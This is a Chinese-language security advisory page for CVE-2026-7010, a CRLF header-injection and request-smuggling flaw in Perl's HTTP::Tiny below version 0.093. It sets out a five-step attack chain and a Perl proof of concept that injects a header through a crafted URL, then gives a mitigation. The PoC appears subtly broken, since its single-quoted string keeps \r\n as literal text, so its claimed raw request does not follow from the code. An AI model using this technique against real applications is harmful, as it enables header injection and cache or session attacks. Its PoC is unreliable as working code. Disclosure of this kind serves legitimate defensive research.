CVE-2026-7010 CVSS 6.5 中危

CVE-2026-7010 HTTP::Tiny CRLF注入漏洞

披露日期: 2026-05-11

来源: 9b29abf9-4ab0-4765-b253-1875cd9b441e

漏洞信息

漏洞编号

CVE-2026-7010

漏洞类型

CRLF注入 / HTTP请求走私

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

HTTP::Tiny (Perl)

漏洞概述

Perl HTTP::Tiny 0.093之前版本未正确验证HTTP请求行或标头值中的CRLF字符。攻击者通过控制URL等输入，可注入额外的HTTP头部，导致请求走私攻击，影响机密性和完整性。

技术细节

该漏洞源于HTTP::Tiny在构造HTTP请求时，未能对请求行中的方法、URI以及头部字段（如Host）中的输入进行严格的CRLF（回车换行）字符过滤。在HTTP协议中，CRLF用于分隔请求行、头部和主体。当应用程序使用受影响版本的HTTP::Tiny处理未经过滤的用户输入（例如传递给Webhook端点或URL抓取功能的URL）时，攻击者可以注入恶意构造的CRLF序列。这会导致解析器将注入的内容误认为是新的HTTP头部或请求结束标记。利用此漏洞，攻击者可以注入任意HTTP头部（如X-Forwarded-For）或实施HTTP请求走私攻击，从而可能绕过安全防护机制、缓存投毒或劫持用户会话，对上游服务器造成安全威胁。

攻击链分析

STEP 1

发现

攻击者识别出目标应用程序使用了存在漏洞的HTTP::Tiny Perl库版本（<0.093）来处理外部URL请求。

STEP 2

构造Payload

攻击者精心构造一个包含CRLF（\r\n）控制字符的恶意URL。该URL旨在打破原有的HTTP请求结构，注入额外的头部字段。

STEP 3

提交输入

攻击者将构造好的恶意URL作为输入（例如通过Webhook地址框或抓取链接功能）发送给目标应用程序。

STEP 4

漏洞利用

应用程序使用HTTP::Tiny处理该URL时，由于缺乏验证，将CRLF字符直接写入HTTP请求流中，导致头部注入或请求走私。

STEP 5

达成影响

上游服务器接收到被篡改的请求，可能执行未授权的操作、泄露敏感信息或绕过安全检查。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

use HTTP::Tiny;
use strict;
use warnings;

# Create a new HTTP::Tiny instance (Vulnerable version < 0.093)
my $ua = HTTP::Tiny->new();

# Malicious URL containing CRLF characters to inject headers
# The URL includes \r\n which splits the request line and adds a custom header
my $malicious_url = 'http://example.com/api\r\nX-Injected-Header: pwned\r\n';

print "Sending request to: $malicious_url\n";

# The vulnerable library will send the following raw request:
# GET /api HTTP/1.1
# Host: example.com
# X-Injected-Header: pwned
# ...

my $response = $ua->get($malicious_url);

if ($response->{success}) {
    print "Request sent.\n";
} else {
    print "Request failed: " . $response->{status} . " " . $response->{reason} . "\n";
}

影响范围

HTTP::Tiny < 0.093

防御指南

临时缓解措施

如果不便立即升级，应在调用HTTP::Tiny发送请求前，对所有用户提供的URL参数进行过滤，移除其中的\r（回车）和\n（换行）字符，确保请求行和头部字段的完整性。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表